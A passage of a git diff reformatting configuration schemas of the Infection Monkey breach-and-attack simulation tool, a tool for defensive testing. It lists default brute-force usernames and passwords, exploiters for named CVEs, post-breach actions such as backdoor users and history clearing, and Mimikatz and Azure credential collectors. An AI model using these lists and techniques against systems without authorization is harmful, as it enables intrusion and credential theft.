+ "type":"array",
+ "uniqueItems":True,
+ "items":{"type":"string"},
+ "default":["Administrator", "root", "user"],
+ "description":"List of user names that will be used by exploiters that need "
+ "credentials, like "
+ "SSH brute-forcing.",
},
- "exploit_password_list": {
- "title": "Exploit password list",
- "type": "array",
- "uniqueItems": True,
- "items": {"type": "string"},
- "default": [
+ "exploit_password_list":{
+ "title":"Exploit password list",
+ "type":"array",
+ "uniqueItems":True,
+ "items":{"type":"string"},
+ "default":[
"root",
"123456",
"password",
@@ -57,8 +58,9 @@ BASIC = {
"111111",
"iloveyou",
],
- "description": "List of passwords that will be used by exploiters that need credentials, like "
- "SSH brute-forcing.",
+ "description":"List of passwords that will be used by exploiters that need "
+ "credentials, like "
+ "SSH brute-forcing.",
},
},
},
diff --git a/monkey/monkey_island/cc/services/config_schema/basic_network.py b/monkey/monkey_island/cc/services/config_schema/basic_network.py
index c515a8cbc..47e574825 100644
--- a/monkey/monkey_island/cc/services/config_schema/basic_network.py
+++ b/monkey/monkey_island/cc/services/config_schema/basic_network.py
@@ -2,80 +2,91 @@ from common.common_consts.validation_formats import IP, IP_RANGE
from monkey_island.cc.services.utils.typographic_symbols import WARNING_SIGN
BASIC_NETWORK = {
- "title": "Network",
- "type": "object",
- "properties": {
- "scope": {
- "title": "Scope",
- "type": "object",
- "properties": {
- "blocked_ips": {
- "title": "Blocked IPs",
- "type": "array",
- "uniqueItems": True,
- "items": {
- "type": "string",
- "format": IP,
+ "title":"Network",
+ "type":"object",
+ "properties":{
+ "scope":{
+ "title":"Scope",
+ "type":"object",
+ "properties":{
+ "blocked_ips":{
+ "title":"Blocked IPs",
+ "type":"array",
+ "uniqueItems":True,
+ "items":{
+ "type":"string",
+ "format":IP,
},
- "default": [],
- "description": "List of IPs that the Monkey will not scan.",
- "info": 'The Monkey scans its subnet if "Local network scan" is ticked. '
- 'Additionally the monkey scans machines according to "Scan target list".',
+ "default":[],
+ "description":"List of IPs that the Monkey will not scan.",
+ "info":'The Monkey scans its subnet if "Local network scan" is ticked. '
+ 'Additionally the monkey scans machines according to "Scan '
+ 'target list".',
},
- "local_network_scan": {
- "title": "Local network scan",
- "type": "boolean",
- "default": True,
- "description": "Determines whether the Monkey will scan the local subnets of machines it runs on, "
- 'in addition to the IPs that are configured manually in the "Scan target list".',
+ "local_network_scan":{
+ "title":"Local network scan",
+ "type":"boolean",
+ "default":True,
+ "description":"Determines whether the Monkey will scan the local subnets of "
+ "machines it runs on, "
+ "in addition to the IPs that are configured manually in the "
+ '"Scan target list".',
},
- "depth": {
- "title": "Scan depth",
- "type": "integer",
- "minimum": 1,
- "default": 2,
- "description": "Amount of hops allowed for the Monkey to spread from the Island server. \n"
- + WARNING_SIGN
- + " Note that setting this value too high may result in the Monkey propagating too far, "
- 'if the "Local network scan" is enabled.',
+ "depth":{
+ "title":"Scan depth",
+ "type":"integer",
+ "minimum":1,
+ "default":2,
+ "description":"Amount of hops allowed for the Monkey to spread from the "
+ "Island server. \n"
+ + WARNING_SIGN
+ + " Note that setting this value too high may result in the "
+ "Monkey propagating too far, "
+ 'if the "Local network scan" is enabled.',
},
- "subnet_scan_list": {
- "title": "Scan target list",
- "type": "array",
- "uniqueItems": True,
- "items": {"type": "string", "format": IP_RANGE},
- "default": [],
- "description": "List of targets the Monkey will try to scan. Targets can be IPs, subnets or hosts."
- " Examples:\n"
- '\tTarget a specific IP: "192.168.0.1"\n'
- '\tTarget a subnet using a network range: "192.168.0.5-192.168.0.20"\n'
- '\tTarget a subnet using an IP mask: "192.168.0.5/24"\n'
- '\tTarget a specific host: "printer.example"',
+ "subnet_scan_list":{
+ "title":"Scan target list",
+ "type":"array",
+ "uniqueItems":True,
+ "items":{"type":"string", "format":IP_RANGE},
+ "default":[],
+ "description":"List of targets the Monkey will try to scan. Targets can be "
+ "IPs, subnets or hosts."
+ " Examples:\n"
+ '\tTarget a specific IP: "192.168.0.1"\n'
+ "\tTarget a subnet using a network range: "
+ '"192.168.0.5-192.168.0.20"\n'
+ '\tTarget a subnet using an IP mask: "192.168.0.5/24"\n'
+ '\tTarget a specific host: "printer.example"',
},
},
},
- "network_analysis": {
- "title": "Network Analysis",
- "type": "object",
- "properties": {
- "inaccessible_subnets": {
- "title": "Network segmentation testing",
- "type": "array",
- "uniqueItems": True,
- "items": {"type": "string", "format": IP_RANGE},
- "default": [],
- "description": "Test for network segmentation by providing a list of network segments "
- "that should NOT be accessible to each other.\n\n"
- "For example, if you configured the following three segments: "
- '"10.0.0.0/24", "11.0.0.2/32", and "12.2.3.0/24", '
- "a Monkey running on 10.0.0.5 will try to access machines in the following subnets: "
- "11.0.0.2/32, 12.2.3.0/24. An alert on successful cross-segment connections "
- "will be shown in the reports. \n\n"
- "Network segments can be IPs, subnets or hosts. Examples:\n"
- '\tDefine a single-IP segment: "192.168.0.1"\n'
- '\tDefine a segment using a network range: "192.168.0.5-192.168.0.20"\n'
- '\tDefine a segment using an subnet IP mask: "192.168.0.5/24"\n'
- '\tDefine a single-host segment: "printer.example"',
+ "network_analysis":{
+ "title":"Network Analysis",
+ "type":"object",
+ "properties":{
+ "inaccessible_subnets":{
+ "title":"Network segmentation testing",
+ "type":"array",
+ "uniqueItems":True,
+ "items":{"type":"string", "format":IP_RANGE},
+ "default":[],
+ "description":"Test for network segmentation by providing a list of network "
+ "segments "
+ "that should NOT be accessible to each other.\n\n"
+ "For example, if you configured the following three segments: "
+ '"10.0.0.0/24", "11.0.0.2/32", and "12.2.3.0/24", '
+ "a Monkey running on 10.0.0.5 will try to access machines in "
+ "the following subnets: "
+ "11.0.0.2/32, 12.2.3.0/24. An alert on successful cross-segment "
+ "connections "
+ "will be shown in the reports. \n\n"
+ "Network segments can be IPs, subnets or hosts. Examples:\n"
+ '\tDefine a single-IP segment: "192.168.0.1"\n'
+ '\tDefine a segment using a network range: '
+ '"192.168.0.5-192.168.0.20"\n'
+ '\tDefine a segment using an subnet IP mask: "192.168.0.5/24"\n'
+ '\tDefine a single-host segment: "printer.example"',
}
},
},
diff --git a/monkey/monkey_island/cc/services/config_schema/config_schema.py b/monkey/monkey_island/cc/services/config_schema/config_schema.py
index 3900b0675..76119626e 100644
--- a/monkey/monkey_island/cc/services/config_schema/config_schema.py
+++ b/monkey/monkey_island/cc/services/config_schema/config_schema.py
@@ -12,22 +12,22 @@ from monkey_island.cc.services.config_schema.internal import INTERNAL
from monkey_island.cc.services.config_schema.monkey import MONKEY
SCHEMA = {
- "title": "Monkey",
- "type": "object",
+ "title":"Monkey",
+ "type":"object",
# Newly added definitions should also be added to
# monkey/monkey_island/cc/ui/src/components/utils/SafeOptionValidator.js so that
# users will not accidentally chose unsafe options
- "definitions": {
- "exploiter_classes": EXPLOITER_CLASSES,
- "system_info_collector_classes": SYSTEM_INFO_COLLECTOR_CLASSES,
- "post_breach_actions": POST_BREACH_ACTIONS,
- "finger_classes": FINGER_CLASSES,
+ "definitions":{
+ "exploiter_classes":EXPLOITER_CLASSES,
+ "system_info_collector_classes":SYSTEM_INFO_COLLECTOR_CLASSES,
+ "post_breach_actions":POST_BREACH_ACTIONS,
+ "finger_classes":FINGER_CLASSES,
},
- "properties": {
- "basic": BASIC,
- "basic_network": BASIC_NETWORK,
- "monkey": MONKEY,
- "internal": INTERNAL,
+ "properties":{
+ "basic":BASIC,
+ "basic_network":BASIC_NETWORK,
+ "monkey":MONKEY,
+ "internal":INTERNAL,
},
- "options": {"collapsed": True},
+ "options":{"collapsed":True},
}
diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
index 88186e9ed..4f3ea91a4 100644
--- a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
+++ b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py
@@ -1,143 +1,158 @@
from monkey_island.cc.services.utils.typographic_symbols import WARNING_SIGN
EXPLOITER_CLASSES = {
- "title": "Exploit class",
- "description": "Click on exploiter to get more information about it."
- + WARNING_SIGN
- + " Note that using unsafe exploits may cause crashes of the exploited machine/service.",
- "type": "string",
- "anyOf": [
+ "title":"Exploit class",
+ "description":"Click on exploiter to get more information about it."
+ + WARNING_SIGN
+ + " Note that using unsafe exploits may cause crashes of the exploited "
+ "machine/service.",
+ "type":"string",
+ "anyOf":[
{
- "type": "string",
- "enum": ["SmbExploiter"],
- "title": "SMB Exploiter",
- "safe": True,
- "attack_techniques": ["T1110", "T1075", "T1035"],
- "info": "Brute forces using credentials provided by user and"
- " hashes gathered by mimikatz.",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/smbexec/",
+ "type":"string",
+ "enum":["SmbExploiter"],
+ "title":"SMB Exploiter",
+ "safe":True,
+ "attack_techniques":["T1110", "T1075", "T1035"],
+ "info":"Brute forces using credentials provided by user and"
+ " hashes gathered by mimikatz.",
+ "link":"https://www.guardicore.com/infectionmonkey/docs/reference"
+ "/exploiters/smbexec/",
},
{
- "type": "string",
- "enum": ["WmiExploiter"],
- "title": "WMI Exploiter",
- "safe": True,
- "attack_techniques": ["T1110", "T1106"],
- "info": "Brute forces WMI (Windows Management Instrumentation) "
- "using credentials provided by user and hashes gathered by mimikatz.",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/wmiexec/",
+ "type":"string",
+ "enum":["WmiExploiter"],
+ "title":"WMI Exploiter",
+ "safe":True,
+ "attack_techniques":["T1110", "T1106"],
+ "info":"Brute forces WMI (Windows Management Instrumentation) "
+ "using credentials provided by user and hashes gathered by "
+ "mimikatz.",
+ "link":"https://www.guardicore.com/infectionmonkey/docs/reference"
+ "/exploiters/wmiexec/",
},
{
- "type": "string",
- "enum": ["MSSQLExploiter"],
- "title": "MSSQL Exploiter",
- "safe": True,
- "attack_techniques": ["T1110"],
- "info": "Tries to brute force into MsSQL server and uses insecure "
- "configuration to execute commands on server.",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/mssql/",
+ "type":"string",
+ "enum":["MSSQLExploiter"],
+ "title":"MSSQL Exploiter",
+ "safe":True,
+ "attack_techniques":["T1110"],
+ "info":"Tries to brute force into MsSQL server and uses insecure "
+ "configuration to execute commands on server.",
+ "link":"https://www.guardicore.com/infectionmonkey/docs/reference"
+ "/exploiters/mssql/",
},
{
- "type": "string",
- "enum": ["Ms08_067_Exploiter"],
- "title": "MS08-067 Exploiter",
- "safe": False,
- "info": "Unsafe exploiter, that might cause system crash due to the use of buffer overflow. "
- "Uses MS08-067 vulnerability.",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/ms08-067/",
+ "type":"string",
+ "enum":["Ms08_067_Exploiter"],
+ "title":"MS08-067 Exploiter",
+ "safe":False,
+ "info":"Unsafe exploiter, that might cause system crash due to the use of buffer "
+ "overflow. "
+ "Uses MS08-067 vulnerability.",
+ "link":"https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/ms08"
+ "-067/",
},
{
- "type": "string",
- "enum": ["SSHExploiter"],
- "title": "SSH Exploiter",
- "safe": True,
- "attack_techniques": ["T1110", "T1145", "T1106"],
- "info": "Brute forces using credentials provided by user and SSH keys gathered from systems.",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/sshexec/",
+ "type":"string",
+ "enum":["SSHExploiter"],
+ "title":"SSH Exploiter",
+ "safe":True,
+ "attack_techniques":["T1110", "T1145", "T1106"],
+ "info":"Brute forces using credentials provided by user and SSH keys "
+ "gathered from systems.",
+ "link":"https://www.guardicore.com/infectionmonkey/docs/reference"
+ "/exploiters/sshexec/",
},
{
- "type": "string",
- "enum": ["ShellShockExploiter"],
- "title": "ShellShock Exploiter",
- "safe": True,
- "info": "CVE-2014-6271, based on logic from "
- "https://github.com/nccgroup/shocker/blob/master/shocker.py .",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/shellshock/",
+ "type":"string",
+ "enum":["ShellShockExploiter"],
+ "title":"ShellShock Exploiter",
+ "safe":True,
+ "info":"CVE-2014-6271, based on logic from "
+ "https://github.com/nccgroup/shocker/blob/master/shocker.py .",
+ "link":"https://www.guardicore.com/infectionmonkey/docs/reference/exploiters"
+ "/shellshock/",
},
{
- "type": "string",
- "enum": ["SambaCryExploiter"],
- "title": "SambaCry Exploiter",
- "safe": True,
- "info": "Bruteforces and searches for anonymous shares. Uses Impacket.",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/sambacry/",
+ "type":"string",
+ "enum":["SambaCryExploiter"],
+ "title":"SambaCry Exploiter",
+ "safe":True,
+ "info":"Bruteforces and searches for anonymous shares. Uses Impacket.",
+ "link":"https://www.guardicore.com/infectionmonkey/docs/reference/exploiters"
+ "/sambacry/",
},
{
- "type": "string",
- "enum": ["ElasticGroovyExploiter"],
- "title": "ElasticGroovy Exploiter",
- "safe": True,
- "info": "CVE-2015-1427. Logic is based on Metasploit module.",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/elasticgroovy/",
+ "type":"string",
+ "enum":["ElasticGroovyExploiter"],
+ "title":"ElasticGroovy Exploiter",
+ "safe":True,
+ "info":"CVE-2015-1427. Logic is based on Metasploit module.",
+ "link":"https://www.guardicore.com/infectionmonkey/docs/reference/exploiters"
+ "/elasticgroovy/",
},
{
- "type": "string",
- "enum": ["Struts2Exploiter"],
- "title": "Struts2 Exploiter",
- "safe": True,
- "info": "Exploits struts2 java web framework. CVE-2017-5638. Logic based on "
- "https://www.exploit-db.com/exploits/41570 .",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/struts2/",
+ "type":"string",
+ "enum":["Struts2Exploiter"],
+ "title":"Struts2 Exploiter",
+ "safe":True,
+ "info":"Exploits struts2 java web framework. CVE-2017-5638. Logic based on "
+ "https://www.exploit-db.com/exploits/41570 .",
+ "link":"https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/struts2/",
},
{
- "type": "string",
- "enum": ["WebLogicExploiter"],
- "title": "WebLogic Exploiter",
- "safe": True,
- "info": "Exploits CVE-2017-10271 and CVE-2019-2725 vulnerabilities on WebLogic server.",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/weblogic/",
+ "type":"string",
+ "enum":["WebLogicExploiter"],
+ "title":"WebLogic Exploiter",
+ "safe":True,
+ "info":"Exploits CVE-2017-10271 and CVE-2019-2725 vulnerabilities on WebLogic server.",
+ "link":"https://www.guardicore.com/infectionmonkey/docs/reference/exploiters"
+ "/weblogic/",
},
{
- "type": "string",
- "enum": ["HadoopExploiter"],
- "title": "Hadoop/Yarn Exploiter",
- "safe": True,
- "info": "Remote code execution on HADOOP server with YARN and default settings. "
- "Logic based on https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn.",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/hadoop/",
+ "type":"string",
+ "enum":["HadoopExploiter"],
+ "title":"Hadoop/Yarn Exploiter",
+ "safe":True,
+ "info":"Remote code execution on HADOOP server with YARN and default settings. "
+ "Logic based on "
+ "https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn.",
+ "link":"https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/hadoop/",
},
{
- "type": "string",
- "enum": ["VSFTPDExploiter"],
- "title": "VSFTPD Exploiter",
- "safe": True,
- "info": "Exploits a malicious backdoor that was added to the VSFTPD download archive. "
- "Logic based on Metasploit module.",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/vsftpd/",
+ "type":"string",
+ "enum":["VSFTPDExploiter"],
+ "title":"VSFTPD Exploiter",
+ "safe":True,
+ "info":"Exploits a malicious backdoor that was added to the VSFTPD download archive. "
+ "Logic based on Metasploit module.",
+ "link":"https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/vsftpd/",
},
{
- "type": "string",
- "enum": ["DrupalExploiter"],
- "title": "Drupal Exploiter",
- "safe": True,
- "info": "Exploits a remote command execution vulnerability in a Drupal server,"
- "for which certain modules (such as RESTful Web Services) are enabled.",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/drupal/",
+ "type":"string",
+ "enum":["DrupalExploiter"],
+ "title":"Drupal Exploiter",
+ "safe":True,
+ "info":"Exploits a remote command execution vulnerability in a Drupal server,"
+ "for which certain modules (such as RESTful Web Services) are enabled.",
+ "link":"https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/drupal/",
},
{
- "type": "string",
- "enum": ["ZerologonExploiter"],
- "title": "Zerologon Exploiter",
- "safe": False,
- "info": "Exploits a privilege escalation vulnerability (CVE-2020-1472) in a Windows "
- "server domain controller by using the Netlogon Remote Protocol (MS-NRPC). "
- "This exploiter changes the password of a Windows server domain controller "
- "account and then attempts to restore it. The victim domain controller "
- "will be unable to communicate with other domain controllers until the original "
- "password has been restored. If Infection Monkey fails to restore the "
- "password automatically, you'll have to do it manually. For more "
- "information, see the documentation.",
- "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/zerologon/",
+ "type":"string",
+ "enum":["ZerologonExploiter"],
+ "title":"Zerologon Exploiter",
+ "safe":False,
+ "info":"Exploits a privilege escalation vulnerability (CVE-2020-1472) in a Windows "
+ "server domain controller by using the Netlogon Remote Protocol (MS-NRPC). "
+ "This exploiter changes the password of a Windows server domain controller "
+ "account and then attempts to restore it. The victim domain controller "
+ "will be unable to communicate with other domain controllers until the original "
+ "password has been restored. If Infection Monkey fails to restore the "
+ "password automatically, you'll have to do it manually. For more "
+ "information, see the documentation.",
+ "link":"https://www.guardicore.com/infectionmonkey"
+ "/docs/reference/exploiters/zerologon/",
},
],
}
diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/finger_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/finger_classes.py
index 88bf44130..b821d3f8c 100644
--- a/monkey/monkey_island/cc/services/config_schema/definitions/finger_classes.py
+++ b/monkey/monkey_island/cc/services/config_schema/definitions/finger_classes.py
@@ -1,70 +1,71 @@
FINGER_CLASSES = {
- "title": "Fingerprint class",
- "description": "Fingerprint modules collect info about external services "
- "Infection Monkey scans.",
- "type": "string",
- "anyOf": [
+ "title":"Fingerprint class",
+ "description":"Fingerprint modules collect info about external services "
+ "Infection Monkey scans.",
+ "type":"string",
+ "anyOf":[
{
- "type": "string",
- "enum": ["SMBFinger"],
- "title": "SMBFinger",
- "safe": True,
- "info": "Figures out if SMB is running and what's the version of it.",
- "attack_techniques": ["T1210"],
+ "type":"string",
+ "enum":["SMBFinger"],
+ "title":"SMBFinger",
+ "safe":True,
+ "info":"Figures out if SMB is running and what's the version of it.",
+ "attack_techniques":["T1210"],
},
{
- "type": "string",
- "enum": ["SSHFinger"],
- "title": "SSHFinger",
- "safe": True,
- "info": "Figures out if SSH is running.",
- "attack_techniques": ["T1210"],
+ "type":"string",
+ "enum":["SSHFinger"],
+ "title":"SSHFinger",
+ "safe":True,
+ "info":"Figures out if SSH is running.",
+ "attack_techniques":["T1210"],
},
{
- "type": "string",
- "enum": ["PingScanner"],
- "title": "PingScanner",
- "safe": True,
- "info": "Tries to identify if host is alive and which OS it's running by ping scan.",
+ "type":"string",
+ "enum":["PingScanner"],
+ "title":"PingScanner",
+ "safe":True,
+ "info":"Tries to identify if host is alive and which OS it's running by ping scan.",
},
{
- "type": "string",
- "enum": ["HTTPFinger"],
- "title": "HTTPFinger",
- "safe": True,
- "info": "Checks if host has HTTP/HTTPS ports open.",
+ "type":"string",
+ "enum":["HTTPFinger"],
+ "title":"HTTPFinger",
+ "safe":True,
+ "info":"Checks if host has HTTP/HTTPS ports open.",
},
{
- "type": "string",
- "enum": ["MySQLFinger"],
- "title": "MySQLFinger",
- "safe": True,
- "info": "Checks if MySQL server is running and tries to get it's version.",
- "attack_techniques": ["T1210"],
+ "type":"string",
+ "enum":["MySQLFinger"],
+ "title":"MySQLFinger",
+ "safe":True,
+ "info":"Checks if MySQL server is running and tries to get it's version.",
+ "attack_techniques":["T1210"],
},
{
- "type": "string",
- "enum": ["MSSQLFinger"],
- "title": "MSSQLFinger",
- "safe": True,
- "info": "Checks if Microsoft SQL service is running and tries to gather information about it.",
- "attack_techniques": ["T1210"],
+ "type":"string",
+ "enum":["MSSQLFinger"],
+ "title":"MSSQLFinger",
+ "safe":True,
+ "info":"Checks if Microsoft SQL service is running and tries to gather "
+ "information about it.",
+ "attack_techniques":["T1210"],
},
{
- "type": "string",
- "enum": ["ElasticFinger"],
- "title": "ElasticFinger",
- "safe": True,
- "info": "Checks if ElasticSearch is running and attempts to find it's version.",
- "attack_techniques": ["T1210"],
+ "type":"string",
+ "enum":["ElasticFinger"],
+ "title":"ElasticFinger",
+ "safe":True,
+ "info":"Checks if ElasticSearch is running and attempts to find it's " "version.",
+ "attack_techniques":["T1210"],
},
{
- "type": "string",
- "enum": ["PostgreSQLFinger"],
- "title": "PostgreSQLFinger",
- "safe": True,
- "info": "Checks if PostgreSQL service is running and if its communication is encrypted.",
- "attack_techniques": ["T1210"],
+ "type":"string",
+ "enum":["PostgreSQLFinger"],
+ "title":"PostgreSQLFinger",
+ "safe":True,
+ "info":"Checks if PostgreSQL service is running and if its communication is encrypted.",
+ "attack_techniques":["T1210"],
},
],
}
diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/post_breach_actions.py b/monkey/monkey_island/cc/services/config_schema/definitions/post_breach_actions.py
index ea9b18aba..0a5db562c 100644
--- a/monkey/monkey_island/cc/services/config_schema/definitions/post_breach_actions.py
+++ b/monkey/monkey_island/cc/services/config_schema/definitions/post_breach_actions.py
@@ -1,101 +1,108 @@
POST_BREACH_ACTIONS = {
- "title": "Post breach actions",
- "description": "Runs scripts/commands on infected machines. These actions safely simulate what an adversary"
- "might do after breaching a new machine. Used in ATT&CK and Zero trust reports.",
- "type": "string",
- "anyOf": [
+ "title":"Post breach actions",
+ "description":"Runs scripts/commands on infected machines. These actions safely simulate what "
+ "an adversary"
+ "might do after breaching a new machine. Used in ATT&CK and Zero trust reports.",
+ "type":"string",
+ "anyOf":[
{
- "type": "string",
- "enum": ["BackdoorUser"],
- "title": "Back door user",
- "safe": True,
- "info": "Attempts to create a new user on the system and delete it afterwards.",
- "attack_techniques": ["T1136"],
+ "type":"string",
+ "enum":["BackdoorUser"],
+ "title":"Back door user",
+ "safe":True,
+ "info":"Attempts to create a new user on the system and delete it " "afterwards.",
+ "attack_techniques":["T1136"],
},
{
- "type": "string",
- "enum": ["CommunicateAsNewUser"],
- "title": "Communicate as new user",
- "safe": True,
- "info": "Attempts to create a new user, create HTTPS requests as that user and delete the user "
- "afterwards.",
- "attack_techniques": ["T1136"],
+ "type":"string",
+ "enum":["CommunicateAsNewUser"],
+ "title":"Communicate as new user",
+ "safe":True,
+ "info":"Attempts to create a new user, create HTTPS requests as that "
+ "user and delete the user "
+ "afterwards.",
+ "attack_techniques":["T1136"],
},
{
- "type": "string",
- "enum": ["ModifyShellStartupFiles"],
- "title": "Modify shell startup files",
- "safe": True,
- "info": "Attempts to modify shell startup files, like ~/.profile, ~/.bashrc, ~/.bash_profile "
- "in linux, and profile.ps1 in windows. Reverts modifications done afterwards.",
- "attack_techniques": ["T1156", "T1504"],
+ "type":"string",
+ "enum":["ModifyShellStartupFiles"],
+ "title":"Modify shell startup files",
+ "safe":True,
+ "info":"Attempts to modify shell startup files, like ~/.profile, "
+ "~/.bashrc, ~/.bash_profile "
+ "in linux, and profile.ps1 in windows. Reverts modifications done"
+ " afterwards.",
+ "attack_techniques":["T1156", "T1504"],
},
{
- "type": "string",
- "enum": ["HiddenFiles"],
- "title": "Hidden files and directories",
- "safe": True,
- "info": "Attempts to create a hidden file and remove it afterward.",
- "attack_techniques": ["T1158"],
+ "type":"string",
+ "enum":["HiddenFiles"],
+ "title":"Hidden files and directories",
+ "safe":True,
+ "info":"Attempts to create a hidden file and remove it afterward.",
+ "attack_techniques":["T1158"],
},
{
- "type": "string",
- "enum": ["TrapCommand"],
- "title": "Trap",
- "safe": True,
- "info": "On Linux systems, attempts to trap an interrupt signal in order to execute a command "
- "upon receiving that signal. Removes the trap afterwards.",
- "attack_techniques": ["T1154"],
+ "type":"string",
+ "enum":["TrapCommand"],
+ "title":"Trap",
+ "safe":True,
+ "info":"On Linux systems, attempts to trap an interrupt signal in order "
+ "to execute a command "
+ "upon receiving that signal. Removes the trap afterwards.",
+ "attack_techniques":["T1154"],
},
{
- "type": "string",
- "enum": ["ChangeSetuidSetgid"],
- "title": "Setuid and Setgid",
- "safe": True,
- "info": "On Linux systems, attempts to set the setuid and setgid bits of a new file. "
- "Removes the file afterwards.",
- "attack_techniques": ["T1166"],
+ "type":"string",
+ "enum":["ChangeSetuidSetgid"],
+ "title":"Setuid and Setgid",
+ "safe":True,
+ "info":"On Linux systems, attempts to set the setuid and setgid bits of "
+ "a new file. "
+ "Removes the file afterwards.",
+ "attack_techniques":["T1166"],
},
{
- "type": "string",
- "enum": ["ScheduleJobs"],
- "title": "Job scheduling",
- "safe": True,
- "info": "Attempts to create a scheduled job on the system and remove it.",
- "attack_techniques": ["T1168", "T1053"],
+ "type":"string",
+ "enum":["ScheduleJobs"],
+ "title":"Job scheduling",
+ "safe":True,
+ "info":"Attempts to create a scheduled job on the system and remove it.",
+ "attack_techniques":["T1168", "T1053"],
},
{
- "type": "string",
- "enum": ["Timestomping"],
- "title": "Timestomping",
- "safe": True,
- "info": "Creates a temporary file and attempts to modify its time attributes. Removes the file afterwards.",
- "attack_techniques": ["T1099"],
+ "type":"string",
+ "enum":["Timestomping"],
+ "title":"Timestomping",
+ "safe":True,
+ "info":"Creates a temporary file and attempts to modify its time "
+ "attributes. Removes the file afterwards.",
+ "attack_techniques":["T1099"],
},
{
- "type": "string",
- "enum": ["SignedScriptProxyExecution"],
- "title": "Signed script proxy execution",
- "safe": False,
- "info": "On Windows systems, attempts to execute an arbitrary file "
- "with the help of a pre-existing signed script.",
- "attack_techniques": ["T1216"],
+ "type":"string",
+ "enum":["SignedScriptProxyExecution"],
+ "title":"Signed script proxy execution",
+ "safe":False,
+ "info":"On Windows systems, attempts to execute an arbitrary file "
+ "with the help of a pre-existing signed script.",
+ "attack_techniques":["T1216"],
},
{
- "type": "string",
- "enum": ["AccountDiscovery"],
- "title": "Account Discovery",
- "safe": True,
- "info": "Attempts to get a listing of user accounts on the system.",
- "attack_techniques": ["T1087"],
+ "type":"string",
+ "enum":["AccountDiscovery"],
+ "title":"Account Discovery",
+ "safe":True,
+ "info":"Attempts to get a listing of user accounts on the system.",
+ "attack_techniques":["T1087"],
},
{
- "type": "string",
- "enum": ["ClearCommandHistory"],
- "title": "Clear command history",
- "safe": False,
- "info": "Attempts to clear the command history.",
- "attack_techniques": ["T1146"],
+ "type":"string",
+ "enum":["ClearCommandHistory"],
+ "title":"Clear command history",
+ "safe":False,
+ "info":"Attempts to clear the command history.",
+ "attack_techniques":["T1146"],
},
],
}
diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/system_info_collector_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/system_info_collector_classes.py
index 487166ec6..b2568f98c 100644
--- a/monkey/monkey_island/cc/services/config_schema/definitions/system_info_collector_classes.py
+++ b/monkey/monkey_island/cc/services/config_schema/definitions/system_info_collector_classes.py
@@ -8,57 +8,58 @@ from common.common_consts.system_info_collectors_names import (
)
SYSTEM_INFO_COLLECTOR_CLASSES = {
- "title": "System Information Collectors",
- "description": "Click on a system info collector to find out what it collects.",
- "type": "string",
- "anyOf": [
+ "title":"System Information Collectors",
+ "description":"Click on a system info collector to find out what it collects.",
+ "type":"string",
+ "anyOf":[
{
- "type": "string",
- "enum": [ENVIRONMENT_COLLECTOR],
- "title": "Environment collector",
- "safe": True,
- "info": "Collects information about machine's environment (on premise/GCP/AWS).",
- "attack_techniques": ["T1082"],
+ "type":"string",
+ "enum":[ENVIRONMENT_COLLECTOR],
+ "title":"Environment collector",
+ "safe":True,
+ "info":"Collects information about machine's environment (on " "premise/GCP/AWS).",
+ "attack_techniques":["T1082"],
},
{
- "type": "string",
- "enum": [MIMIKATZ_COLLECTOR],
- "title": "Mimikatz collector",
- "safe": True,
- "info": "Collects credentials from Windows credential manager.",
- "attack_techniques": ["T1003", "T1005"],
+ "type":"string",
+ "enum":[MIMIKATZ_COLLECTOR],
+ "title":"Mimikatz collector",
+ "safe":True,
+ "info":"Collects credentials from Windows credential manager.",
+ "attack_techniques":["T1003", "T1005"],
},
{
- "type": "string",
- "enum": [AWS_COLLECTOR],
- "title": "AWS collector",
- "safe": True,
- "info": "If on AWS, collects more information about the AWS instance currently running on.",
- "attack_techniques": ["T1082"],
+ "type":"string",
+ "enum":[AWS_COLLECTOR],
+ "title":"AWS collector",
+ "safe":True,
+ "info":"If on AWS, collects more information about the AWS instance "
+ "currently running on.",
+ "attack_techniques":["T1082"],
},
{
- "type": "string",
- "enum": [HOSTNAME_COLLECTOR],
- "title": "Hostname collector",
- "safe": True,
- "info": "Collects machine's hostname.",
- "attack_techniques": ["T1082", "T1016"],
+ "type":"string",
+ "enum":[HOSTNAME_COLLECTOR],
+ "title":"Hostname collector",
+ "safe":True,
+ "info":"Collects machine's hostname.",
+ "attack_techniques":["T1082", "T1016"],
},
{
- "type": "string",
- "enum": [PROCESS_LIST_COLLECTOR],
- "title": "Process list collector",
- "safe": True,
- "info": "Collects a list of running processes on the machine.",
- "attack_techniques": ["T1082"],
+ "type":"string",
+ "enum":[PROCESS_LIST_COLLECTOR],
+ "title":"Process list collector",
+ "safe":True,
+ "info":"Collects a list of running processes on the machine.",
+ "attack_techniques":["T1082"],
},
{
- "type": "string",
- "enum": [AZURE_CRED_COLLECTOR],
- "title": "Azure credential collector",
- "safe": True,
- "info": "Collects password credentials from Azure VMs",
